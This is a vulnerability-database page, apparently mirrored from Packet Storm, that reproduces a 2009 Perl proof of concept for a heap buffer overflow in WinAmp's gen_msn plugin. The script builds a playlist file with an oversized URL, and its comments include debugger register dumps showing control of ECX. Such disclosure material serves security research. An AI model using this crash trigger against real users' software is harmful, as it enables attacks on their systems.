Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WinAmp GEN_MSN Plugin Heap Buffer Overflow

🗓️ 07 Jan 2009 00:00:00Reported by SkDType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 23 Views

WinAmp GEN_MSN Plugin heap buffer overflow discovered by SkD. Overflows in gen_msn plugin showing current song on MSN with 800,000+ downloads. Exploits similar to VUPlayer

Code
`#!/usr/bin/perl  
# WinAmp GEN_MSN Plugin Heap Buffer Overflow  
# ------------------------------------  
# Discovered by SkD ([email protected]) &  
# ([email protected])  
# ------------------------------------  
#  
# I'm not much for posting PoCs because  
# I like writing exploits for whatever  
# I discover and if I don't, its a waste.  
#  
# Anyway, this buffer overflow is located  
# in the gen_msn plugin, which  
# is basically a plugin that shows what  
# song you're currently listening to  
# on your PM in MSN. The plugin has over  
# 800,000 downloads so its serious..  
# (http://www.winamp.com/plugins/details/144799)  
# This is similar to my other recent exploit  
# for VUPlayer because it uses the same point  
# of the .PLS playlist file!  
#  
# Debug Info:  
# MOV EDI,DWORD PTR DS:[ECX+EAX*4+960]  
# Regs:  
# EAX 00000003  
# ECX 41414141 <- Clear control over the register  
# EDX 007EA478  
# EBX 40000001  
# ESP 028F1DB0  
# EBP 77230459 USER32.SendMessageA  
# ESI 08FD62A8 gen_msn.08FD62A8  
# EDI 00497300 UNICODE "http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"  
# EIP 08FD293C gen_msn.08FD293C  
#  
# Peace out.  
# _________ ___ ________  
# / _____/| | __\______ \  
# \_____ \ | |/ / | | \  
# / \| < | ` \  
# /_______ /|__|_ \/_______ /  
# \/ \/ \/  
use strict;  
use warnings;  
  
my $overflow = "\x41" x 2048;  
  
open(my $pls_playlist, "> poc.pls");  
print $pls_playlist "[playlist]\r\n".  
"NumberOfEntries=1\r\n".  
"File1=http://".  
$overflow.  
"\r\n";  
close $pls_playlist;  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jan 2009 00:00Current
0.9Low risk
Vulners AI Score0.9
winampgen_msnbuffer overflowpluginmsnvuplayerskd
23